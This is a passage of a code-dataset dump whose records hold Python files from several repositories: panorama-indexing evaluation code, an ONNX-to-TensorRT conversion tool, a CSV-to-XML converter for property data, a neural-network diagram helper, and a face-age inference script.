cluster_info_stages\n return features_stages\n\n def compute_clusters(self, feat_aggregation, cluster_file= None, randomize=False):\n \"\"\"\n\n :param feat_aggregation: str\n :param cluster_file: str\n :param randomize: bool\n :return:\n \"\"\"\n assert feat_aggregation.startswith(('none', 'yaw', 'pano', 'room', 'custom')), \\\n 'Invalid feat_aggregation string'\n cluster_info = []\n if feat_aggregation == 'none':\n for i in self.db_indices:\n cluster_info.append({\n 'room_id': self.image_info['room'][i],\n 'pano_id': self.image_info['pano'][i],\n 'image_id': i,\n 'image_ids': [i]\n })\n elif feat_aggregation.startswith('yaw'):\n # Adaptive scheme means that the number of bins is automatically related to the number of panoramas in the\n # room\n if '_' in 
feat_aggregation:\n num_bins_specified = int(feat_aggregation.split('_')[1])\n adaptive_scheme = feat_aggregation.startswith('yawadap')\n else:\n # yaw is equivalent to yawadap_1\n num_bins_specified = 1\n adaptive_scheme = True\n for room_id in range(self.num_rooms):\n db_in_room = np.intersect1d(np.where(self.image_info['room'] == room_id)[0], self.db_indices)\n if adaptive_scheme:\n # We bin the yaw angle so that the number of descriptors per room is (around)\n # the same as the number of panoramas\n panoramas = [self.image_data[db_idx]['source_pano_filename'] for db_idx in db_in_room]\n num_panos_in_room = len(np.unique(panoramas))\n num_bins = num_panos_in_room * num_bins_specified\n else:\n num_bins = num_bins_specified\n if num_bins == 0:\n continue\n yaw = np.array(\n [self.get_yaw_from_quaternion(self.image_data[db_idx]['final_camera_rotation'])\n for db_idx in db_in_room]\n )\n yaw_quant = np.digitize(yaw, np.arange(-np.pi, np.pi, 2*np.pi/num_bins))-1\n for yaw_id in range(num_bins):\n ids = db_in_room[np.where(yaw_quant == yaw_id)[0]]\n cluster_info.append({\n 'room_id': room_id,\n 'pano_id': None,\n 'image_id': None,\n 'image_ids': list(ids)\n })\n elif feat_aggregation.startswith('pano'):\n num_bins = 1\n num_bins_v = 1\n if '_' in feat_aggregation:\n num_bins = int(feat_aggregation.split('_')[1])\n if feat_aggregation.count('_') == 2:\n num_bins_v = int(feat_aggregation.split('_')[2])\n assert num_bins_v == 1 or num_bins_v == 3, \\\n 'Only 1 or 3 vertical bins are allowed'\n panoramas = []\n # For each panorama, draw a random offset value in [0, 360) so that the aggregation is randomized\n if self.pano_rand_offset is None:\n self.pano_rand_offset = {}\n for pano_filename in set([image['source_pano_filename'] for image in self.image_data]):\n self.pano_rand_offset[pano_filename] = np.random.rand() * 360\n for image in self.image_data:\n if len(image['filename'].split('_')) < 3:\n rel_yaw = 0\n else:\n rel_yaw = float(image['filename'].split('_')[-3])\n if randomize:\n rel_yaw = (rel_yaw + self.pano_rand_offset[image['source_pano_filename']]) % 360\n rel_yaw_bin = np.floor(rel_yaw * num_bins / 360)\n pitch_bin = 0\n if num_bins_v > 1 and len(image['filename'].split('_')) >= 3:\n pitch = float(image['filename'].split('_')[-1][:-4])\n if pitch < -10.0:\n pitch_bin = 0\n elif pitch > 10.0:\n pitch_bin = 2\n else:\n pitch_bin = 1\n panoramas.append('%s_%d_%d' % (image['source_pano_filename'], rel_yaw_bin, pitch_bin))\n panoramas = np.array(panoramas)\n unique_panoramas = np.unique(panoramas)\n for pano in unique_panoramas:\n cluster_ids = np.where(panoramas == pano)[0]\n # Unchecked: we expect that all images associated to a panorama have the same pano ID\n room_id = self.image_info['room'][cluster_ids[0]]\n pano_id = self.image_info['pano'][cluster_ids[0]]\n ids = np.intersect1d(cluster_ids, self.db_indices)\n cluster_info.append({\n 'room_id': room_id,\n 'pano_id': pano_id,\n 'image_id': None,\n 'image_ids': list(ids)\n })\n elif feat_aggregation == 'room':\n for room_id in range(self.num_rooms):\n db_in_room = np.intersect1d(np.where(self.image_info['room'] == room_id)[0], self.db_indices)\n cluster_info.append({\n 'room_id': room_id,\n 'pano_id': None,\n 'image_id': None,\n 'image_ids': list(db_in_room)\n })\n elif feat_aggregation == 'custom':\n clusters = json.load(open(cluster_file))\n for room in clusters:\n if not isinstance(clusters[room], list):\n continue\n if room in self.room_string_to_id:\n room_id = self.room_string_to_id[room]\n else:\n room_id = None\n for cluster 
in clusters[room]:\n assert len(np.setdiff1d(cluster['ids'], self.db_indices)) == 0, \\\n 'The clustering file should only include views included in the database'\n cluster_info.append({\n 'room_id': room_id,\n 'pano_id': None,\n 'image_id': None,\n 'image_ids': cluster['ids']\n })\n else:\n raise NotImplementedError('Unsupported aggregation mode')\n return cluster_info\n\n @staticmethod\n def get_yaw_from_quaternion(quat):\n \"\"\"\n\n :param quat: list\n :return:\n \"\"\"\n # Returns a yaw value in [-pi, pi]\n return np.arctan2(2.0*(quat[1]*quat[2] + quat[3]*quat[0]),\n quat[3]*quat[3] - quat[0]*quat[0] - quat[1]*quat[1] + quat[2]*quat[2])\n\n def aggregate_by_cluster(self, features, cluster_info, pooling):\n valid_cluster_indices = []\n aggregated_features = []\n for cluster_idx, cluster in enumerate(cluster_info):\n feat_indices = [np.where(self.db_indices == i)[0][0] for i in cluster['image_ids']]\n if not feat_indices:\n continue\n valid_cluster_indices.append(cluster_idx)\n x = features[feat_indices, :]\n if pooling == 'mean':\n aggregated_feature = np.mean(x, axis=0)\n elif pooling == 'gmp':\n aggregated_feature = np.mean(np.dot(np.linalg.inv(np.dot(x, x.T)+np.eye(x.shape[0])), x), axis=0)\n else:\n raise NotImplementedError('Unsupported pooling strategy')\n aggregated_features.append(aggregated_feature)\n # Only keep non-empty clusters\n cluster_info_nonempty = [cluster_info[i] for i in valid_cluster_indices]\n aggregated_features = np.array(aggregated_features)\n # Normalize features\n aggregated_features /= np.sqrt((aggregated_features * aggregated_features).sum(axis=1))[:, None]\n return aggregated_features, cluster_info_nonempty\n\n def get_filename(self, i):\n return os.path.normpath(\"{0}/{1}\".format(self.img_root, self.image_data[i]['filename']))\n\n\nclass PanoRetrievalDataset(Dataset):\n def get_pano_info(self):\n # For each panorama, we look up the camera location and the room ID\n panos = [image['source_pano_filename'] for image in self.image_data]\n _, unique_panos_index = np.unique(panos, return_index=True)\n pano_info = []\n for i in unique_panos_index:\n pano_location = np.array(self.image_data[i]['camera_location'])\n room_id = self.image_info['room'][i]\n db_ids = set(np.where(self.image_info['pano'] == self.image_info['pano'][i])[0]). 
\\\n intersection(set(self.db_indices))\n pano_info.append({'location': pano_location, 'room_id': room_id, 'db_ids': sorted(list(db_ids))})\n return pano_info\n\n def set_ground_truth_info(self, pano_dist_threshold, ignore_rooms=False):\n \"\"\"\n\n :param pano_dist_threshold: float\n :param ignore_rooms: bool\n :return:\n \"\"\"\n pano_info = self.get_pano_info()\n\n # Get ground truth information based on panorama location\n self.query_indices = []\n self.query_id_to_positive_classes = {}\n for query_info in self.all_query_info:\n query_idx = query_info['id']\n query_location = np.array(self.image_data[query_idx]['camera_location'])\n if 'room_labels' in query_info:\n query_pano_rooms = [self.room_string_to_id[room] for room in query_info['room_labels']]\n else:\n query_pano_rooms = [self.image_info['room'][query_idx]]\n assert self.image_info['room'][query_idx] in query_pano_rooms, \\\n 'The room containing the panorama is not listed in the list of ground truth rooms'\n # Find matching panoramas (only consider the ones corresponding to db images)\n pano_query_dist = np.full(len(pano_info), np.nan)\n for i, pano in enumerate(pano_info):\n if not ignore_rooms and pano['room_id'] not in query_pano_rooms:\n continue\n if len(pano['db_ids']) == 0:\n # Pano isn't a db pano\n continue\n pano_query_dist[i] = np.linalg.norm(query_location - pano['location'])\n if np.all(np.isnan(pano_query_dist)):\n print('WARNING: No available panorama for ground truth.')\n continue\n # Note: we suppress warnings for this command because Numpy complains about nan comparisons\n with np.errstate(invalid='ignore'):\n sub_thresh_panos = np.where(pano_query_dist < pano_dist_threshold)[0]\n if len(sub_thresh_panos) > 0:\n gt_pano_ids = sub_thresh_panos\n else:\n gt_pano_ids = np.array([np.nanargmin(pano_query_dist)])\n self.query_indices.append(query_idx)\n self.query_id_to_positive_classes[query_idx] = gt_pano_ids\n self.query_indices = np.array(self.query_indices, dtype=int)\n\n\nclass FeatureExtractor(object):\n def __init__(self, temp_dir, multires, S, L):\n \"\"\"\n\n :param temp_dir: str\n :param multires: bool\n :param S:\n :param L:\n \"\"\"\n self.temp_dir = temp_dir\n self.multires = multires\n self.S = S\n self.L = L\n self.features_queries = None\n self.features_dataset = None\n\n def extract_features(self, dataset, image_helper, net):\n \"\"\"\n\n :param dataset: Dataset\n :param image_helper: ImageHelper\n :param net:\n :return:\n \"\"\"\n Ss = [self.S, ] if not self.multires else [self.S - 250, self.S, self.S + 250]\n for S in Ss:\n # Set the scale of the image helper\n image_helper.S = S\n out_descr_fname = \"{0}/descr_S{1}_L{2}.npy\".format(self.temp_dir, S, self.L)\n generate_features = False\n if os.path.exists(out_descr_fname):\n features = np.load(out_descr_fname)\n if features.shape[0] != dataset.size_dataset:\n print('--> Pre-generated features have incorrect shape ; generating new features')\n generate_features = True\n else:\n generate_features = True\n if generate_features:\n dim_features = net.blobs['rmac/normalized'].data.shape[1]\n features = np.empty((dataset.size_dataset, dim_features), dtype=np.float32)\n features.fill(np.nan)\n # Check which of the features we need to compute haven't been computed yet (= nan)\n compute_indices = []\n for i in np.concatenate((dataset.query_indices, dataset.db_indices)):\n if np.isnan(features[i, 0]):\n compute_indices.append(i)\n for i in tqdm(compute_indices, file=sys.stdout, leave=False, dynamic_ncols=True):\n # Load image, process image, get image 
regions, feed into the network, get descriptor, and store\n I, R = image_helper.prepare_image_and_grid_regions(dataset.get_filename(i), roi=None)\n features[i] = image_helper.get_rmac_features(I, R, net)\n # Save new matrix if needed\n if compute_indices:\n np.save(out_descr_fname, features)\n features = np.dstack(\n [np.load(\"{0}/descr_S{1}_L{2}.npy\".format(self.temp_dir, S, self.L)) for S in Ss]\n ).sum(axis=2)\n features /= np.sqrt((features * features).sum(axis=1))[:, None]\n # Restore the original scale\n image_helper.S = self.S\n\n # Extract queries and db features in 2 different matrices\n self.features_queries = features[dataset.query_indices, :]\n assert (np.isnan(self.features_queries).any() == False)\n self.features_dataset = [features[dataset.db_indices, :]]\n assert (np.isnan(self.features_dataset).any() == False)\n", "repo_name": "jbboin/panorama-indexing-localization", "sub_path": "evaluate_lib.py", "file_name": "evaluate_lib.py", "file_ext": "py", "file_size_in_byte": 25065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 76, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 81, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 90, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.minimum", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 198, "usage_type": "call"}, {"api_name": "os.path", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 198, "usage_type": "call"}, {"api_name": "json.load", "line_number": 200, 
"usage_type": "call"}, {"api_name": "os.path.join", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path", "line_number": 200, "usage_type": "attribute"}, {"api_name": "operator.itemgetter", "line_number": 201, "usage_type": "call"}, {"api_name": "json.load", "line_number": 213, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 217, "usage_type": "call"}, {"api_name": "json.load", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.digitize", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 331, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 354, "usage_type": "attribute"}, {"api_name": "numpy.floor", "line_number": 362, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 373, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 380, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 389, "usage_type": "call"}, {"api_name": "json.load", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.setdiff1d", "line_number": 406, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 426, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 439, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 441, "usage_type": "attribute"}, {"api_name": "numpy.eye", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 447, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 449, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 453, "usage_type": "call"}, {"api_name": "os.path", "line_number": 453, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 460, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 463, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 465, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 484, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 492, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 499, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 
499, "usage_type": "attribute"}, {"api_name": "numpy.all", "line_number": 500, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 500, "usage_type": "call"}, {"api_name": "numpy.errstate", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 505, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.nanargmin", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 512, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 545, "usage_type": "call"}, {"api_name": "os.path", "line_number": 545, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 546, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 554, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 554, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 555, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 558, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 559, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 561, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 561, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 567, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 569, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 571, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 577, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 579, "usage_type": "call"}]}
+{"seq_id": "13921550251", "text": "import argparse\nimport logging\n\nfrom mmdeploy.backend.tensorrt import from_onnx\nfrom mmdeploy.backend.tensorrt.utils import get_trt_log_level\nfrom mmdeploy.utils import (get_common_config, get_model_inputs,\n get_root_logger, load_config)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Convert ONNX to TensorRT.')\n parser.add_argument('deploy_cfg', help='deploy config path')\n parser.add_argument('onnx_path', help='ONNX model path')\n parser.add_argument('output_prefix', help='output TensorRT engine prefix')\n parser.add_argument('--device-id', help='`the CUDA device id', default=0)\n parser.add_argument(\n '--calib-file',\n help='`the calibration data used to calibrate engine to int8',\n default=None)\n parser.add_argument(\n '--log-level',\n help='set log level',\n default='INFO',\n choices=list(logging._nameToLevel.keys()))\n args = parser.parse_args()\n\n return args\n\n\ndef main():\n args = parse_args()\n logger = get_root_logger(log_level=args.log_level)\n\n deploy_cfg_path = args.deploy_cfg\n deploy_cfg = load_config(deploy_cfg_path)[0]\n onnx_path = args.onnx_path\n output_prefix = args.output_prefix\n device_id = args.device_id\n calib_file = args.calib_file\n\n model_id = 0\n common_params = get_common_config(deploy_cfg)\n model_params = get_model_inputs(deploy_cfg)[model_id]\n\n final_params = common_params\n final_params.update(model_params)\n\n int8_param = final_params.get('int8_param', dict())\n\n if calib_file is not None:\n int8_param['calib_file'] = calib_file\n # do not support partition model calibration for now\n int8_param['model_type'] = 'end2end'\n\n logger.info(f'onnx2tensorrt: \\n\\tonnx_path: {onnx_path} '\n f'\\n\\tdeploy_cfg: {deploy_cfg_path}')\n from_onnx(\n onnx_path,\n output_prefix,\n input_shapes=final_params['input_shapes'],\n log_level=get_trt_log_level(),\n fp16_mode=final_params.get('fp16_mode', False),\n int8_mode=final_params.get('int8_mode', False),\n int8_param=int8_param,\n max_workspace_size=final_params.get('max_workspace_size', 0),\n device_id=device_id)\n\n logger.info('onnx2tensorrt success.')\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "open-mmlab/mmdeploy", "sub_path": "tools/onnx2tensorrt.py", "file_name": "onnx2tensorrt.py", "file_ext": "py", "file_size_in_byte": 2332, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2256, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "logging._nameToLevel.keys", "line_number": 24, "usage_type": "call"}, {"api_name": "logging._nameToLevel", "line_number": 24, "usage_type": "attribute"}, {"api_name": "mmdeploy.utils.get_root_logger", "line_number": 32, "usage_type": "call"}, {"api_name": "mmdeploy.utils.load_config", "line_number": 35, "usage_type": "call"}, {"api_name": "mmdeploy.utils.get_common_config", "line_number": 42, "usage_type": "call"}, {"api_name": "mmdeploy.utils.get_model_inputs", "line_number": 43, "usage_type": "call"}, {"api_name": "mmdeploy.backend.tensorrt.from_onnx", "line_number": 57, "usage_type": "call"}, {"api_name": "mmdeploy.backend.tensorrt.utils.get_trt_log_level", "line_number": 61, "usage_type": "call"}]}
+{"seq_id": "10545186052", "text": "#! /usr/bin/env python\nimport csv\nimport decimal\nfrom xml.dom.minidom import Document\n\ndata = csv.DictReader (open(\"../data/zips2013.csv\",'U'))\n#Create the XML doc\ndoc = Document()\n#create the base element\ndocbase = doc.createElement(\"docbase\")\ndoc.appendChild(docbase)\n\ndef gapFixer(n):\n if \"NA\" == n:\n return n\n else:\n dec = int(round(decimal.Decimal(n), 2)*100)\n return str(dec)\n\nfor row in data:\n #create the row element\n\tZIP = doc.createElement('ZIP')\n\n\tZIP.setAttribute('COUNTY', row['County'].strip())\n\tZIP.setAttribute('ZIP_CODE', row['ZIP'].strip())\n\tZIP.setAttribute('GAP', gapFixer(row['GAP']))\n\tZIP.setAttribute('PRICE', row['MEDIAN SALE PRICE'])\n\tZIP.setAttribute('SALES', row['1ST QUARTER SALES'])\n\tdocbase.appendChild(ZIP)\n\nf = open('../data/zips2013.xml', 'w')\ndoc.writexml(f, addindent=\" \", newl=\"\\n\")\nf.close()", "repo_name": "ucabgao/IRA4", "sub_path": "emilymerwin/PropertyTax/py/proptaxCSVtoXML.py", "file_name": "proptaxCSVtoXML.py", "file_ext": "py", "file_size_in_byte": 858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "csv.DictReader", "line_number": 6, "usage_type": "call"}, {"api_name": "xml.dom.minidom.Document", "line_number": 8, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "4614820064", "text": "from IPython import display\nimport pydotplus\nimport matplotlib as plt\n\ndef draw_graph(spec):\n return display.Image(pydotplus.graphviz.graph_from_dot_data(spec).create_png())\n\n\ndef draw_example_1():\n return draw_graph(\"\"\"\n digraph G {\n\n rankdir=LR\n splines=line\n\n node [fixedsize=true];\n\n subgraph cluster_0 {\n \t\tcolor=white;\n \t\tnode [style=solid,color=blue4, shape=circle];\n \t\tx1 x2 x3;\n \t\tlabel = \"layer 1 (Input layer)\";\n \t}\n\n \tsubgraph cluster_1 {\n \t\tcolor=white;\n \t\tnode [style=solid,color=red2, shape=circle];\n \t\th1 h2;\n \t\tlabel = \"layer 2 (hidden layer)\";\n \t}\n\n \tsubgraph cluster_2 {\n \t\tcolor=white;\n \t\tnode [style=solid,color=seagreen2, shape=circle];\n \t\tyhat;\n \t\tlabel=\"layer 3 (output layer)\";\n \t}\n\n x2 -> h1;\n x3 -> h1;\n x1 -> h1;\n x3 -> h2;\n x2 -> h2;\n x1 -> h2;\n\n h1 -> yhat\n h2 -> yhat\n\n }\n \"\"\")\n\n\ndef draw_neural_net(ax, left, right, bottom, top, layer_sizes):\n '''\n Draw a neural network cartoon using matplotilb.\n\n :usage:\n >>> fig = plt.figure(figsize=(12, 12))\n >>> draw_neural_net(fig.gca(), .1, .9, .1, .9, [4, 7, 2])\n\n :parameters:\n - ax : matplotlib.axes.AxesSubplot\n The axes on which to plot the cartoon (get e.g. by plt.gca())\n - left : float\n The center of the leftmost node(s) will be placed here\n - right : float\n The center of the rightmost node(s) will be placed here\n - bottom : float\n The center of the bottommost node(s) will be placed here\n - top : float\n The center of the topmost node(s) will be placed here\n - layer_sizes : list of int\n List of layer sizes, including input and output dimensionality\n '''\n n_layers = len(layer_sizes)\n v_spacing = (top - bottom)/float(max(layer_sizes))\n h_spacing = (right - left)/float(len(layer_sizes) - 1)\n # Nodes\n for n, layer_size in enumerate(layer_sizes):\n layer_top = v_spacing*(layer_size - 1)/2. + (top + bottom)/2.\n for m in range(layer_size):\n circle = plt.Circle((n*h_spacing + left, layer_top - m*v_spacing), v_spacing/4.,\n color='w', ec='k', zorder=4)\n ax.add_artist(circle)\n # Edges\n for n, (layer_size_a, layer_size_b) in enumerate(zip(layer_sizes[:-1], layer_sizes[1:])):\n layer_top_a = v_spacing*(layer_size_a - 1)/2. + (top + bottom)/2.\n layer_top_b = v_spacing*(layer_size_b - 1)/2. + (top + bottom)/2.\n for m in range(layer_size_a):\n for o in range(layer_size_b):\n line = plt.Line2D([n*h_spacing + left, (n + 1)*h_spacing + left],\n [layer_top_a - m*v_spacing, layer_top_b - o*v_spacing], c='k')\n ax.add_artist(line)\n", "repo_name": "bryantravissmith/first-neural-network", "sub_path": "diagrams/draw_network.py", "file_name": "draw_network.py", "file_ext": "py", "file_size_in_byte": 2927, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "IPython.display.Image", "line_number": 6, "usage_type": "call"}, {"api_name": "IPython.display", "line_number": 6, "usage_type": "name"}, {"api_name": "pydotplus.graphviz.graph_from_dot_data", "line_number": 6, "usage_type": "call"}, {"api_name": "pydotplus.graphviz", "line_number": 6, "usage_type": "attribute"}, {"api_name": "matplotlib.Circle", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.Line2D", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "30324554307", "text": "import argparse\nimport time\nimport torch\nimport cv2\nimport numpy as np\nfrom torchvision import transforms\nfrom align_image import align\nimport model\nfrom PIL import Image\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--device\", type=str, default='cpu')\nparser.add_argument(\"--image\", type=str, default='tests/test2.jpg')\nparser.add_argument(\"--kind\", type=str, default='image', help=\"image or camera?\")\nargs = parser.parse_args()\n\n\ntransform = transforms.Compose([\n # transforms.PILToTensor(),\n transforms.Resize((160,160)),\n # transforms.RandomRotation(10),\n transforms.ToTensor(),\n # torchvision.transforms.Normalize((0), (1))\n])\n\n\ndevice=args.device\nm=model.Model()\nm.load_state_dict(torch.load('weight.pth',map_location=args.device))\nm.eval()\n\ndef pred(img):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n face = align(img)\n if np.all(face != None):\n img=cv2.resize(face,(160,160))\n img = Image.fromarray(img)\n tensor=transform(img).unsqueeze(0)\n tensor=tensor.to(device)\n start=time.time()\n pred=m(tensor)\n print(f\"{time.time()-start} sec\")\n pred=pred.cpu().detach().numpy()\n return pred\n else:\n return -1\n\n\n\n\nif args.kind ==\"camera\":\n cap=cv2.VideoCapture(0)\n while True:\n valid, frame = cap.read()\n if valid is not True:\n break\n\n row, col, ch = frame.shape\n mask = frame[row //2-100:row // 2+100, col // 2-100:col // 2+100]\n frame=cv2.medianBlur(frame,33)\n frame[0:row]=(255,0,0)\n frame[row // 2-100:row // 2+100, col // 2-100:col // 2+100] = mask\n y_pr=pred(mask)\n frame=cv2.putText(frame,str(y_pr), (50,50), cv2.FONT_HERSHEY_SIMPLEX,1,(0,0,255), 3, 2)\n cv2.imshow('',frame)\n cv2.waitKey(1)\n\nelse:\n img=cv2.imread(args.image)\n o=pred(img)\n print(o)\n\n\n\n\n\n", "repo_name": "FatemeZamanian/DeepLearning", "sub_path": "Face Age RegressionTorch/inference.py", "file_name": "inference.py", "file_ext": "py", "file_size_in_byte": 1920, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 19, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 19, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 21, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 21, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 23, "usage_type": "name"}, {"api_name": "model.Model", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 34, "usage_type": "attribute"}, {"api_name": "align_image.align", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 38, "usage_type": "name"}, {"api_name": "time.time", "line_number": 41, "usage_type": "call"}, {"api_name": "time.time", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 53, "usage_type": "call"}, 
{"api_name": "cv2.medianBlur", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 65, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 70, "usage_type": "call"}]}
